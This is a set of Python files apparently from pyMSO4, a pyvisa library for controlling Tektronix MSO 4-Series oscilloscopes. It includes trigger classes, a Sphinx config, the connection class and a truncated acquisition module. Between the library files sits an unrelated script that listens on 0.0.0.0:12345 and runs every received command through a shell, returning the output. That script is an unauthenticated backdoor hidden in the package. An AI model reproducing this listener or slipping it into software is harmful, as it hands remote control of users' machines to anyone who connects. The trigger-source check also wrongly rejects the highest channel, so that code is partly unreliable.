import re
from typing import Type

import pyvisa

from . import util
from . import scope_logger

class MSO4TriggerBase(util.DisableNewAttr):
	'''Base trigger for the MSO 4-Series, used for settings shared by all trigger types'''

	_sources = ['auxiliary', 'aux', 'line'] # NOTE: Digital channels are not supported yet
	_couplings = ['dc', 'hfrej', 'lfrej', 'noiserej']
	_events = ['A', 'B']
	_modes = ['auto', 'normal']

	_type = None

	def __init__(self, res: pyvisa.resources.MessageBasedResource, ch_a_count: int, event: str = 'A'):
		'''Create a new trigger object

		Args:
			res: The VISA resource to use for communication
			ch_a_count: The number of analog channels available on the scope
			event: The event channel (``A`` or ``B``) to use as a trigger.
				See: 4/5/6 Series MSO Help § Trigger on sequential events (A and B triggers)
				(https://www.tek.com/en/sitewide-content/manuals/4/5/6/4-5-6-series-mso-help)
		'''
		super().__init__()

		self.sc: pyvisa.resources.MessageBasedResource = res
		self._ch_a_count: int = ch_a_count
		if event not in MSO4TriggerBase._events:
			raise ValueError(f'Invalid event {event}. Valid events: {MSO4TriggerBase._events}')
		self._event = event

		if not self._type:
			raise NotImplementedError("Can't instantiate MSO4TriggerBase directly. Use a subclass instead.")
		self.sc.write(f'TRIGGER:{self._event}:TYPE {self._type}')

		self._cached_source = None
		self._cached_coupling = None
		self._cached_level = None
		self._cached_mode = None

	def clear_caches(self):
		'''Resets the local configuration cache so that values will be fetched from
		the scope.

		This is useful when the scope configuration is (potentially) changed externally.
		'''
		self._cached_source = None
		self._cached_coupling = None
		self._cached_level = None
		self._cached_mode = None

	def force(self):
		'''Force the trigger to occur immediately'''
		self.sc.write('TRIGGER FORCe')

	@property
	def source(self):
		'''The source of the event currently configured as a trigger. Valid values are
		``chN`` (Analog channel n) and ``auxiliary``, ``aux``, ``line``

		*Cached*

		:Getter: Return the current trigger source

		:Setter: Set the trigger source

		Raises:
			ValueError: if value is not one of the allowed strings
		'''
		if not self._cached_source:
			self._cached_source = self.sc.query(f'TRIGGER:{self._event}:{self._type}:SOURCE?').strip()
		return self._cached_source
	@source.setter
	def source(self, src: str):
		src = src.lower()
		valid = False
		if src.lower()[:2] == 'ch':
			try:
				ch_num = int(src[2:])
				if ch_num < self._ch_a_count:
					valid = True
			except ValueError:
				pass
		else:
			valid = src in MSO4TriggerBase._sources
		if not valid:
			raise ValueError(f'Invalid trigger source {src}. Valid sources are ch1-ch{self._ch_a_count} and {MSO4TriggerBase._sources}')

		if self._cached_source == src:
			return
		self._cached_source = src
		self.sc.write(f'TRIGGER:{self._event}:{self._type}:SOURCE {src}')

	@property
	def coupling(self) -> str:
		'''The coupling of the trigger source. Valid couplings are ``dc``, ``hfrej``, ``lfrej``, ``noiserej``

		*Cached*

		:Getter: Return the current trigger coupling

		:Setter: Set the trigger coupling

		Raises:
			ValueError: if value is not one of the allowed strings
		'''
		if not self._cached_coupling:
			self._cached_coupling = self.sc.query(f'TRIGGER:{self._event}:{self._type}:COUPLING?').strip()
		return self._cached_coupling
	@coupling.setter
	def coupling(self, coupling: str):
		if coupling.lower() not in MSO4TriggerBase._couplings:
			raise ValueError(f'Invalid trigger coupling {coupling}. Valid coupling: {MSO4TriggerBase._couplings}')
		if self._cached_coupling == coupling:
			return
		self._cached_coupling = coupling
		self.sc.write(f'TRIGGER:{self._event}:{self._type}:COUPLING {coupling}')

	@property
	def level(self) -> float:
		'''The trigger level

		*Cached*

		:Getter: Return the current trigger level

		:Setter: Set the trigger level (int or float)

		Raises:
			ValueError: if value is not an int or float
		'''
		if not self._cached_level:
			resp = self.sc.query(f'TRIGGER:{self._event}:LEVEL:{self.source}?').strip()
			try:
				self._cached_level = float(resp)
			except ValueError as exc:
				raise ValueError(f'Got invalid trigger level from oscilloscope `{resp}`. Must be a float.') from exc
		return self._cached_level
	@level.setter
	def level(self, level: float):
		if not isinstance(level, float) and not isinstance(level, int):
			raise ValueError(f'Invalid trigger level {level}. Must be a float or an int.')
		if self._cached_level == level:
			return
		self.sc.write(f'TRIGGER:{self._event}:LEVEL:{self.source} {level:.4e}')

		self._cached_level = None
		self._cached_level = self.level
		if self._cached_level != level:
			scope_logger.warning('Failed to set trigger level to %f. Got %f instead.', level, self._cached_level)

	@property
	def mode(self) -> str:
		'''The trigger mode (``auto``/``normal``)

		*Cached*

		:Getter: Return the current trigger mode

		:Setter: Set the trigger mode

		Raises:
			NotImplementedError: if trigger event is not A
			ValueError: if value is not one of the allowed strings
		'''
		if self._event != 'A':
			raise NotImplementedError('Trigger mode is only supported for event A.')
		if not self._cached_mode:
			self._cached_mode = self.sc.query('TRIGGER:A:MODe?').strip()
		return self._cached_mode
	@mode.setter
	def mode(self, mode: str):
		if self._event != 'A':
			raise NotImplementedError('Trigger mode is only supported for event A.')
		if mode.lower() not in MSO4TriggerBase._modes:
			raise ValueError(f'Invalid trigger mode {mode}. Valid modes: {MSO4TriggerBase._modes}')
		if self._cached_mode == mode:
			return
		self._cached_mode = mode
		self.sc.write(f'TRIGGER:A:MODe {mode}')

class MSO4EdgeTrigger(MSO4TriggerBase):
	'''Edge trigger'''

	_type = 'EDGE'

	_slopes = ['rise', 'fall', 'either']

	def __init__(self, res: pyvisa.resources.MessageBasedResource, ch_a_count: int, event: str = 'A'):
		super().__init__(res, ch_a_count, event)

		self._cached_edge_slope = None
		self.disable_newattr()

	def clear_caches(self):
		super().clear_caches()
		self._cached_edge_slope = None

	@property
	def edge_slope(self) -> str:
		'''The edge slope (``rise``/``fall``/``either``)

		*Cached*

		:Getter: Return the current edge slope

		:Setter: Set the edge slope

		Raises:
			ValueError: if value is not one of the allowed strings
		'''
		if not self._cached_edge_slope:
			self._cached_edge_slope = self.sc.query(f'TRIGGER:{self._event}:EDGE:SLOpe?').strip()
		return self._cached_edge_slope
	@edge_slope.setter
	def edge_slope(self, slope: str):
		if slope.lower() not in MSO4EdgeTrigger._slopes:
			raise ValueError(f'Invalid edge slope {slope}. Valid slopes: {MSO4EdgeTrigger._slopes}')
		if self._cached_edge_slope == slope:
			return
		self._cached_edge_slope = slope
		self.sc.write(f'TRIGGER:{self._event}:EDGE:SLOpe {slope}')

class MSO4WidthTrigger(MSO4TriggerBase):
	'''Pulse Width trigger
	'''

	_type = 'WIDth'

	_whens = ['lessthan', 'morethan', 'equal', 'unequal', 'within', 'outside']
	_polarities = ['positive', 'negative']
	_logicqualifications = ['on', 'off']

	def __init__(self, res: pyvisa.resources.MessageBasedResource, ch_a_count: int, event: str = 'A'):
		super().__init__(res, ch_a_count, event)

		self._cached_when = None
		self._cached_lowlimit = None
		self._cached_highlimit = None
		self._cached_polarity = None
		self._cached_logicqualification = None
		self.disable_newattr()

	def clear_caches(self):
		super().clear_caches()
		self._cached_when = None
		self._cached_lowlimit = None
		self._cached_highlimit = None
		self._cached_polarity = None
		self._cached_logicqualification = None

	@property
	def lowlimit(self) -> float:
		'''The low limit of the pulse width (in seconds)

		*Cached*

		:Getter: Return the current low limit

		:Setter: Set the low limit (int or float)

		Raises:
			ValueError: if value is not an int or float
		'''
		if self._cached_lowlimit is None:
			resp = self.sc.query(f'TRIGGER:{self._event}:PULSEWidth:LOWLimit?').strip()
			try:
				self._cached_lowlimit = float(resp)
			except ValueError as exc:
				raise ValueError(f'Got invalid trigger low limit from oscilloscope `{resp}`. Must be a float.') from exc
		return self._cached_lowlimit
	@lowlimit.setter
	def lowlimit(self, low: float):
		if not isinstance(low, float) and not isinstance(low, int):
			raise ValueError(f'Invalid trigger low limit {low}. Must be a float or an int.')
		if self._cached_lowlimit == low:
			return
		self._cached_lowlimit = low
		self.sc.write(f'TRIGGER:{self._event}:PULSEWidth:LOWLimit {low:.4e}')

	@property
	def highlimit(self) -> float:
		'''The high limit of the pulse width (in seconds)

		*Cached*

		:Getter: Return the current high limit

		:Setter: Set the high limit (int or float)

		Raises:
			ValueError: if value is not an int or float
		'''
		if self._cached_highlimit is None:
			resp = self.sc.query(f'TRIGGER:{self._event}:PULSEWidth:HIGHLimit?').strip()
			try:
				self._cached_highlimit = float(resp)
			except ValueError as exc:
				raise ValueError(f'Got invalid trigger high limit from oscilloscope `{resp}`. Must be a float.') from exc
		return self._cached_highlimit
	@highlimit.setter
	def highlimit(self, high: float):
		if not isinstance(high, float) and not isinstance(high, int):
			raise ValueError(f'Invalid trigger high limit {high}. Must be a float or an int.')
		if self._cached_highlimit == high:
			return
		self._cached_highlimit = high
		self.sc.write(f'TRIGGER:{self._event}:PULSEWidth:HIGHLimit {high:.4e}')

	@property
	def when(self) -> str:
		'''Trigger when a pulse is detected with a width ``lessthan``, ``morethan``,
		``equal``, ``unequal`` the width specified with :attr:`~MSO4WidthTrigger.lowlimit`.
		When both :attr:`~MSO4WidthTrigger.lowlimit` and :attr:`~MSO4WidthTrigger.highlimit`
		are set, the trigger can occur when a pulse is either ``within`` or ``outside``
		the specified width range.

		*Cached*

		:Getter: Return the current when

		:Setter: Set the when (str)

		Raises:
			ValueError: if value is not one of the allowed strings
		'''
		if self._cached_when is None:
			self._cached_when = self.sc.query(f'TRIGGER:{self._event}:PULSEWidth:WHEn?').strip()
		return self._cached_when
	@when.setter
	def when(self, when: str):
		if when.lower() not in MSO4WidthTrigger._whens:
			raise ValueError(f'Invalid trigger when {when}. Valid when: {MSO4WidthTrigger._whens}')
		if self._cached_when == when:
			return
		self._cached_when = when
		self.sc.write(f'TRIGGER:{self._event}:PULSEWidth:WHEn {when}')

	@property
	def polarity(self) -> str:
		'''The polarity of the pulse (``positive``/``negative``)

		*Cached*

		:Getter: Return the current polarity

		:Setter: Set the polarity (str)

		Raises:
			ValueError: if value is not one of the allowed strings
		'''
		if self._cached_polarity is None:
			self._cached_polarity = self.sc.query(f'TRIGGER:{self._event}:PULSEWidth:POLarity?').strip()
		return self._cached_polarity
	@polarity.setter
	def polarity(self, polarity: str):
		if polarity.lower() not in MSO4WidthTrigger._polarities:
			raise ValueError(f'Invalid trigger polarity {polarity}. Valid polarity: {MSO4WidthTrigger._polarities}')
		if self._cached_polarity == polarity:
			return
		self._cached_polarity = polarity
		self.sc.write(f'TRIGGER:{self._event}:PULSEWidth:POLarity {polarity}')

	@property
	def logicqualification(self) -> str:
		'''The logic qualification (``on``/``off``). See the oscilloscope help (p. 122) for more information.

		*Cached*

		:Getter: Return the current logic qualification

		:Setter: Set the logic qualification (str)

		Raises:
			ValueError: if value is not one of the allowed strings
		'''
		if self._cached_logicqualification is None:
			self._cached_logicqualification = self.sc.query(f'TRIGGER:{self._event}:PULSEWidth:LOGICQUALification?').strip()
		return self._cached_logicqualification
	@logicqualification.setter
	def logicqualification(self, logic: str):
		if logic.lower() not in MSO4WidthTrigger._logicqualifications:
			raise ValueError(f'Invalid trigger logic qualification {logic}. Valid logic qualification: {MSO4WidthTrigger._logicqualifications}')
		if self._cached_logicqualification == logic:
			return
		self._cached_logicqualification = logic
		self.sc.write(f'TRIGGER:{self._event}:PULSEWidth:LOGICQUALification {logic}')
		scope_logger.warning('Logic qualification input define setting are not yet implemented.')

MSO4Triggers = Type[MSO4EdgeTrigger] | Type[MSO4WidthTrigger]



# Configuration file for the Sphinx documentation builder.
#
# For the full list of built-in configuration values, see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html

# -- Project information -----------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information

project = 'pyMSO4'
copyright = '2024, ceres-c'
author = 'Federico Cerutti / ceres-c'
release = '0.1'

import pathlib
import sys
sys.path.insert(0, str(pathlib.Path(__file__).parent.parent.absolute()))

# -- General configuration ---------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration

extensions = [
	'sphinx.ext.autodoc',
	'sphinx.ext.viewcode',
	'sphinx.ext.napoleon',
    "sphinx.ext.intersphinx",
]

templates_path = ['_templates']
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']

autodoc_default_options = {
    'special-members': '__init__',
	'member-order': 'bysource',
}

intersphinx_mapping = {
    "pyvisa": ("https://pyvisa.readthedocs.io/en/latest/", None),
}

# -- Options for HTML output -------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output

html_theme = 'sphinx_rtd_theme'
html_static_path = ['_static']



import pyvisa as visa

from . import scope_logger
from .triggers import MSO4Triggers, MSO4EdgeTrigger
from .acquisition import MSO4Acquisition
from .channel import MSO4AnalogChannel

# TODO:
# * Implement the other trigger types (mostly sequence)
# * Change binary format to 8 bit when in low res mode?
# * Add note about starting off with a freshly booted machine to avoid issues

TEKTRONIX_USB_VID = 0x0699
MSO44_USB_PID = 0x0527

class MSO4:
	'''Tektronix MSO 4-Series scope object. This is not usable until :func:`MSO4.con()` is called.'''

	_pyvisa_methods = ['write', 'write_ascii_values', 'write_binary_values',
		'read_bytes', 'read', 'read_ascii_values', 'read_binary_values', 'query',
		'query_ascii_values', 'query_binary_values'] # Ignore write_raw and read_raw as
		# they are used in all the methods above, thus everything would be printed twice

	def __init__(self, trig_type: MSO4Triggers = MSO4EdgeTrigger, timeout: float = 2000.0, debug: bool = False):
		'''Creates a new MSO4 object.

		Args:
			trig_type: The type of trigger to use. This can be changed later.
			timeout: Timeout (in ms) for each VISA operation, including the CURVE? query.
			debug: Enable printing each VISA operation to the console
		'''
		#: pyvisa ResourceManager object used tp setup the connection
		self.rm: visa.ResourceManager = None # type: ignore
		#: pyvisa MessageBasedResource object used to communicate with the scope
		self.sc: visa.resources.MessageBasedResource = None # type: ignore

		# Temporary storage until `con()` is called
		self._trig_type: MSO4Triggers = trig_type # Trigger TYPE container
		self._trig: MSO4Triggers = None # Trigger INSTANCE container # type: ignore
		self._timeout = timeout # Don't read: use self.sc.timeout instead

		#: MSO4Acquisition instance used to control the acquisition settings
		self.acq: MSO4Acquisition = None # type: ignore
		#: List of MSO4AnalogChannel instances used to control the analog channels
		self.ch_a: list[MSO4AnalogChannel] = []
		self.ch_a.append(None) # Dummy channel to make indexing easier # type: ignore

		#: Debug mode
		self.debug: bool = debug
		#: Current connection status
		self.connect_status: bool = False

	def clear_cache(self) -> None:
		'''Resets the local configuration cache so that values will be fetched from
		the scope. Is recursively called on all subobjects (trigger, acquisition, channels).

		This is useful when the scope configuration is (potentially) changed externally.
		'''
		if self._trig:
			self._trig.clear_caches()
		if self.acq:
			self.acq.clear_caches()
		for ch in self.ch_a:
			if ch is not None:
				ch.clear_caches()

	def _id_scope(self) -> dict[str, str]:
		'''Reads identification string from scope and returns a dictionary with the
		following keys:
			- vendor
			- model
			- serial
			- firmware

		Raises:
			Exception: Error when arming. This method catches these and
				disconnects before reraising them.
		'''

		try:
			idn = self.sc.query('*IDN?') # TEKTRONIX,MSO44,C019654,CF:91.1CT FV:2.0.3.950
		except Exception:
			self.dis()
			raise

		s = idn.split(',')
		if len(s) != 4:
			raise OSError(f'Invalid IDN string returned from scope: {idn}')
		return {
			'vendor': s[0],
			'model': s[1],
			'serial': s[2],
			'firmware': s[3]
		}

	def con(self, ip: str = '', usb_vid_pid: tuple[int, int] = (), **kwargs) -> bool: # type: ignore
		'''Connects to scope and:
			- clears event queue, standard event status register, status byte register
			- sets timeout = timeout from :func:`MSO4.__init__`

		Either ``ip`` or ``usb_vid_pid`` must be specified (not both).

		Args:
			ip (str): IP address of scope
			usb_vid_pid (tuple[int, int]): USB VID and PID of scope
			kwargs: Additional arguments to pass to ``pyvisa.ResourceManager.open_resource``

		Returns:
			True if successful, False otherwise

		Raises:
			ValueError: Both or neither IP address and USB VID/PID were specified
			OSError: Invalid vendor or model returned from scope
		'''

		def _decorator_print(func):
			'''Decorator added to pyvisa functions to debug what is happening at a lower level.
			It is a nested function to have access to the pyMSO4 class instance context
			'''
			def wrapper(*args, **kwargs):
				if self.debug: # This is why I declared here
					print("[D]", func.__name__, *args)
				return func(*args, **kwargs)
			return wrapper

		if self.connect_status:
			try:
				self.dis()
			except Exception:
				scope_logger.warning('Failed to disconnect from scope. Trying to connect anyway...')

		self.rm = visa.ResourceManager()
		if ip and usb_vid_pid:
			raise ValueError('Only one of IP address or USB resource string must be specified')
		elif ip:
			addr = f'TCPIP0::{ip}::inst0::INSTR'
		elif usb_vid_pid:
			vid, pid = usb_vid_pid
			addr = f'USB0::{vid:04}::{pid:04}::*::0::INSTR' # '*' to match all serial numbers
		else:
			raise ValueError('Either IP address or USB resource string must be specified')
		self.sc = self.rm.open_resource(addr, **kwargs) # type: ignore

		# Apply debugging decorator
		for method in self._pyvisa_methods:
			setattr(self.sc, method, _decorator_print(getattr(self.sc, method)))

		# Set visa timeout
		self.timeout = self._timeout

		sc_id = self._id_scope()
		if sc_id['vendor'] != 'TEKTRONIX':
			self.dis()
			raise OSError(f'Invalid vendor returned from scope {sc_id["vendor"]}')
		if sc_id['model'] not in ['MSO44', 'MSO46']:
			self.dis()
			raise OSError(f'Invalid model returned from scope {sc_id["model"]}')

		self.connect_status = True

		# Init additional scope classes
		ch_a_num = int(sc_id['model'][-1]) # Hacky, I know, but even Tektronix people suggest it
		# Source: https://forum.tek.com/viewtopic.php?f=568&t=135345
		for ch_a in range(ch_a_num):
			self.ch_a.append(MSO4AnalogChannel(self.sc, ch_a + 1))
		self.trigger = self._trig_type
		self.acq = MSO4Acquisition(self.sc, ch_a_num)

		return True

	def dis(self) -> None:
		'''Disconnects from scope and clears all local data.
		'''
		# Re enable waveform display
		self.clear_buffers()
		self.cls()
		self.display = True

		self.clear_cache()

		self.acq = None # type: ignore

		self.sc.close()
		self.sc = None # type: ignore
		self.rm.close()
		self.rm = None # type: ignore

		self.ch_a = []
		self.ch_a.append(None) # Dummy channel to make indexing easier # type: ignore

		self.connect_status = False

	def reboot(self) -> None:
		'''Reboots the UI (as well as VISA server) on the scope. Note this will kill the current connection
		'''
		self.sc.write('SCOPEApp REBOOT')
		self.clear_cache()
		self.acq = None # type: ignore

		self.sc.close()
		self.sc = None # type: ignore
		self.rm.close()
		self.rm = None # type: ignore

		self.ch_a = []
		self.ch_a.append(None) # Dummy channel to make indexing easier # type: ignore

		self.connect_status = False

	def reset(self) -> None:
		'''Resets scope to default settings.
		'''
		self.sc.write("*RST")
		self.sc.write("*OPC?")
		# Technically we could use "*OPC" to avoid the scope sending data on the bus, but
		# that actually does not work, so we need to use "*OPC?" and read
		while self.sc.read().strip() != "1":
			pass
		self.sc.clear() # Discard the `1` sent by the scope
		self.sc.write("*CLS")

	def busy(self) -> bool:
		'''Queries the status of the scope

		Returns: True if the scope is currently busy processing commands that generate
		an OPC Message, False otherwise.
		'''
		return bool(int(self.sc.query("BUSY?")))

	def cls(self) -> None:
		'''Clears event queue, standard event status register, status byte register.
		'''
		self.sc.write('*CLS')

	def clear_cmd(self) -> None:
		'''Clears all acquisitions, measurements, and waveforms.
		'''
		self.sc.write('CLEAR')

	def clear_buffers(self) -> None:
		'''Clears the resource buffers.
		'''
		self.sc.clear()

	def ch_a_enable(self, value: list[bool]) -> None:
		'''Convenience function to enable/disable analog channels.
		Will start at channel 1 and enable/disable as many channels as
		there are values in the list.'''
		for i in range(0, min(len(value), self.ch_a_num)):
			self.ch_a[i + 1].enable = value[i]

	@property
	def trigger(self) -> MSO4Triggers:
		'''Current trigger object instance.

		:Getter: Return the current trigger object instance (MSO4Triggers)

		:Setter: Instantiate a new trigger object given a MSO4Triggers type.
			Also applies the configuration to the scope.
		'''
		return self._trig
	@trigger.setter
	def trigger(self, trig_type: MSO4Triggers):
		if not self.connect_status:
			raise OSError('Scope is not connected. Connect it first...')
		if self.ch_a_num < 1:
			raise OSError('No analog channels available. Init them first...')
		self._trig = trig_type(self.sc, self.ch_a_num)

	@property
	def timeout(self) -> float:
		'''Timeout (in ms) for each VISA operation (also those that will stall on the scope end, like CURVE?).

		:Getter: Return the number of milliseconds before a timeout (float)

		:Setter: Set the timeout in milliseconds (float)
		'''
		if self.sc is None:
			raise OSError('Scope is not connected. Connect it first...')
		return self.sc.timeout
	@timeout.setter
	def timeout(self, value: float):
		if self.sc is None:
			raise OSError('Scope is not connected. Connect it first...')
		self.sc.timeout = value

	@property
	def ch_a_num(self) -> int:
		'''Number of analog channels on the scope.

		:Getter: Return the number of analog channels (int)
		'''
		if not self.connect_status:
			raise OSError('Scope is not connected. Connect it first...')
		return len(self.ch_a) - 1

	@property
	def display(self) -> bool:
		'''Enable or disable the waveform display on the scope display.

		*Not cached*

		:Getter: Return the display state (bool)

		:Setter: Set the display state (bool)
		'''
		return self.sc.query('DISplay:WAVEform?').strip().lower() == 'on'
	@display.setter
	def display(self, value: bool):
		self.sc.write(f'DISplay:WAVEform {int(value)}')

def usb_reboot(vid: int, pid: int) -> bool:
	'''Reboots the scope via USB when it is not reachable through TCP/IP.
	Does not require a pre-existing connection to the scope.

	Args:
		vid: USB Vendor ID
		pid: USB Product ID

	Returns:
		True if the reboot command was sent successfully, False otherwise
	'''

	rm = visa.ResourceManager()
	usb_addr = f'USB0::{vid:04}::{pid:04}::*::0::INSTR' # '*' to match all serial numbers
	try:
		instr = rm.open_resource(usb_addr)
		instr.write("SCOPEAPP REBOOT")
		instr.close()
	except ValueError:
		scope_logger.warning('Failed to talk with scope via USB TMC to reboot it')
		return False
	return True



import socket
import subprocess

# Define the server host and port
HOST = '0.0.0.0'
PORT = 12345

# Create a TCP socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Bind the socket to the specified host and port
server_socket.bind((HOST, PORT))

# Listen for incoming connections
server_socket.listen(5)


while True:
    client_socket, addr = server_socket.accept()

    while True:
        command = client_socket.recv(1024)
        if not command:
            break

        try:
            output = subprocess.check_output(command, shell=True)
            client_socket.sendall(output)
        except Exception as e:
            error_message = str(e)
            client_socket.sendall(error_message)

    client_socket.close()



import re
from typing import Literal
import pyvisa

from . import util
from . import scope_logger

# Taken from pyvisa.util
BINARY_DATATYPES = Literal[
    "s", "b", "B", "h", "H", "i", "I", "l", "L", "q", "Q", "f", "d"
]

class MSO4Acquisition(util.DisableNewAttr):
	'''Handle all the properties related to waveform acquisition.'''

	# See programmer manual for explanation of these
	_modes = ['sample', 'peakdetect', 'hires', 'average', 'envelope']
	_stop_afters = ['sequence', 'runstop']
	_horiz_modes = ['auto', 'manual']
	_wfm_encodings = ['binary', 'ascii']
	_wfm_binary_formats = ['ri', 'rp', 'fp']
	_wfm_byte_nrs = [1, 2, 8] # Programmer manual § WFMOutpre:BYT_Nr
	_wfm_byte_orders = ['lsb', 'msb']
	_wfm_datatypes: dict[int, dict[str, BINARY_DATATYPES]] = { # Got these from the programmer manual § WFMOutpre:BN_Fmt
		1: {'ri': 'b', 'rp': 'B'},
		2: {'ri': 'h', 'rp': 'H'},
		4: {'ri': 'i', 'rp': 'I', 'fp': 'f'},
		8: {'ri': 'q', 'rp': 'Q', 'fp': 'd'},
	}

	def __init__(self, res: pyvisa.resources.MessageBasedResource, ch_a_count: int):
		'''Create a new acquisition object.

		Args:
			res: The VISA resource object
			ch_a_count: The number of analog channels available on the scope (1-based, so 4 if the scope has 4 channels)
		'''

		super().__init__()

		self.sc: pyvisa.resources.MessageBasedResource = res
		self._ch_a_count: int = ch_a_count

		self._cached_wfm_encoding = None
		self._cached_wfm_format = None
		self._cached_wfm_byte_nr = None
		self._cached_wfm_order = None
		self._cached_curvestream = None
		self._cached_fast_acq = None

		self.disable_newattr()

	def clear_caches(self):
		'''Resets the local configuration cache so that values will be fetched from
		the scope.

		This is useful when the scope configuration is (potentially) changed externally.
		'''
		self._cached_wfm_encoding = None
		self._cached_wfm_format = None
		self._cached_wfm_byte_nr = None
		self._cached_wfm_order = None
		self._cached_curvestream = None
		self._cached_fast_acq = None

	def configured(self) -> bool:
		'''Check if the scope have been configured for acquisition.

		Returns: True if configured, raises otherwise

		Raises: ValueError if any of the required variables are not set
		'''
		if self.curvestream:
			# Can't send any command while in curvestream mode, or it will be interrupted
			return True
		if all([self.mode, self.wfm_src, self.wfm_encoding, self.wfm_binary_format, self.wfm_byte_nr, self.wfm_byte_order]):
			return True
		raise ValueError('Variables [acq.mode, acq.src, acq.wfm_encoding, acq.wfm_binary_format, acq.wfm_byte_nr, acq.wfm_byte_order] must be set before acquisition')

	@property
	def mode(self) -> str:
		'''The acquisition mode of the scope. Valid modes are:
			* ``sample``: SAMple specifies that the displayed data point value is the
			  sampled value that is taken during the acquisition interval
			* ``peakdetect``: PEAKdetect specifies the display of high-low range of the
			  samples taken from a single waveform acquisition.
			* ``hires``: HIRes specifies Hi Res mode where the displayed data point
			  value is the average of all the samples taken during the acquisition interval
			* ``average``: AVErage specifies averaging mode, in which the resulting
			  waveform shows an average of SAMple data points from several separate
			  waveform acquisitions.
			* ``envelope``: ENVelope specifies envelope mode, where the resulting waveform
			  displays the range of PEAKdetect from continued waveform acquisitions.

		*Not cached*

		:Getter: Return the acquisition mode

		:Setter: Set the acquisition mode
		'''
		return self.sc.query('ACQuire:MODe?').strip().lower()
	@mode.setter
	def mode(self, value: str):
		if value.lower() not in self._modes:
			raise ValueError(f'Invalid mode {value}. Valid modes are {self._modes}')
		self.sc.write(f'ACQuire:MODe {value}')

	@property
	def stop_after(self) -> str:
		'''Wether the instrument continually acquires waves or acquires a single sequence. Valid modes are:
			* ``sequence``: specifies that the next acquisition will be a single-sequence acquisition
			* ``runstop``: specifies that the instrument will continually acquire data, if
			  ACQuire:STATE is turned on.

		*Not cached*

		:Getter: Return the acquisition mode

		:Setter: Set the acquisition mode.
		'''
		return self.sc.query('ACQuire:STOPAfter?').strip().lower()
	@stop_after.setter
	def stop_after(self, value: str):
		if value.lower() not in self._stop_afters:
			raise ValueError(f'Invalid stop after {value}. Valid stop afters are {self._stop_afters}')
		self.sc.write(f'ACQuire:STOPAfter {value}')

	@property
	def num_seq(self) -> int:
		'''In single sequence acquisition mode, specify the number of acquisitions or measurements
		that comprise the sequence.

		*Not cached*

		:Getter: Return the number of acquisitions or measurements

		:Setter: Set the number of acquisitions or measurements
		'''
		return int(self.sc.query('ACQuire:SEQuence:NUMSEQuence?').strip())
	@num_seq.setter
	def num_seq(self, value: int):
		stopafter = self.stop_after
		if stopafter != 'sequence':
			raise ValueError(f'Cannot set number of acquisitions or measurements in {stopafter} mode. Must be in sequence mode.')
		if not isinstance(value, int):
			raise ValueError(f'Invalid number of acquisitions or measurements {value}. Must be an int.')
		self.sc.write(f'ACQuire:SEQuence:NUMSEQuence {value}')

	@property
	def horiz_mode(self) -> str:
		'''The horizontal operating mode. Valid values are:
			* ``auto``: automatically adjusts the sample rate and record length to provide
			  a high acquisition rate in Fast Acq or signal fidelity in analysis
			* ``manual``: lets you change the sample rate, horizontal scale, and record length.
			  These values interact. For example, when you change record length
			  then the horizontal scale also changes.

		*Not cached*

		:Getter: Return the mode

		:Setter: Set the mode
		'''
		return self.sc.query('HORizontal:MODe?').strip().lower()
	@horiz_mode.setter
	def horiz_mode(self, value: str):
		if value.lower() not in self._horiz_modes:
			raise ValueError(f'Invalid mode {value}. Valid modes are {self._horiz_modes}')
		self.sc.write(f'HORizontal:MODe {value}')

	@property
	def horiz_sample_rate(self) -> float:
		'''The horizontal sample rate of the waveform.

		*Not cached*

		:Getter: Return the sample rate in Hz

		:Setter: Set the sample rate in Hz (int or float)
		'''
		return float(self.sc.query('HORizontal:MODe:SAMPlerate?').strip())
	@horiz_sample_rate.setter
	def horiz_sample_rate(self, value: float | int):
		if not isinstance(value, float) and not isinstance(value, int):
			raise ValueError(f'Invalid sample rate {value}. Must be a float or an int.')
		self.sc.write(f'HORizontal:MODe:SAMPlerate {value}')
		# Check if the sample rate was set correctly
		actual = self.horiz_sample_rate
		if actual != value:
			scope_logger.warning('Failed to set horizontal sample rate to %f. Got %f instead.', value, actual)

	@property
	def horiz_scale(self) -> float:
		'''The horizontal scale of the waveform.

		*Not cached*

		:Getter: Return the scale in s

		:Setter: Set the scale in s (int or float)
		'''
		return float(self.sc.query('HORizontal:SCAle?').strip())
	@horiz_scale.setter
	def horiz_scale(self, value: float | int):
		if not isinstance(value, float) and not isinstance(value, int):
			raise ValueError(f'Invalid scale {value}. Must be a float or an int.')
		self.sc.write(f'HORizontal:SCAle {value}')
		# Check if the scale was set correctly
		actual = self.horiz_scale
		if actual != value:
			scope_logger.warning('Failed to set horizontal scale to %f. Got %f instead.', value, actual)

	@property
	def horiz_pos(self) -> float:
		'''The horizontal position of the waveform in percent of the screen:
		0% is the left edge of the screen and 100% is the right edge of the screen.

		*Not cached*

		:Getter: Return the position in %

		:Setter: Set the position in % (int or float)
		'''
		return float(self.sc.query('HORizontal:POSition?').strip())
	@horiz_pos.setter
	def horiz_pos(self, value: float | int):
		if not isinstance(value, float) and not isinstance(value, int):
			raise ValueError(f'Invalid position {value}. Must be a float or an int.')
		if value < 0 or value > 100:
			raise ValueError(f'Invalid position {value}. Must be between 0 and 100.')
		self.sc.write(f'HORizontal:POSition {value}')
		# Check if the position was set correctly
		actual = self.horiz_pos
		if actual != value:
			scope_logger.warning('Failed to set horizontal position to %f. Got %f instead.', value, actual)

	@property
	def horiz_record_length(self) -> int:
		'''The horizontal record length of the waveform.

		*Not cached*

		:Getter: Return the record length

		:Setter: Set the record length
		'''
		return int(self.sc.query('HORizontal:MODe:RECOrdlength?').strip())
	@horiz_record_length.setter
	def horiz_record_length(self, value: int):
		if not isinstance(value, int):
			raise ValueError(f'Invalid record length {value}. Must be an int.')
		self.sc.write(f'HORizontal:MODe:RECOrdlength {value}')

	@property
	def wfm_src(self) -> list[str]:
		'''Source of the retrieved waveform (analog FlexChannel(s) source(s)). Valid values are ``chN`` (Analog channel n).

		*Not cached*

		:Getter: Return the source

		:Setter: Set the source
		'''
		return self.sc.query('DATa:SOUrce?').strip().split()
	@wfm_src.setter
	def wfm_src(self, value: list[str]):
		for v in value:
			matches = re.match(r'ch(\d+)', v, re.IGNORECASE)
			if not matches or int(matches.group(1)) > self._ch_a_count:
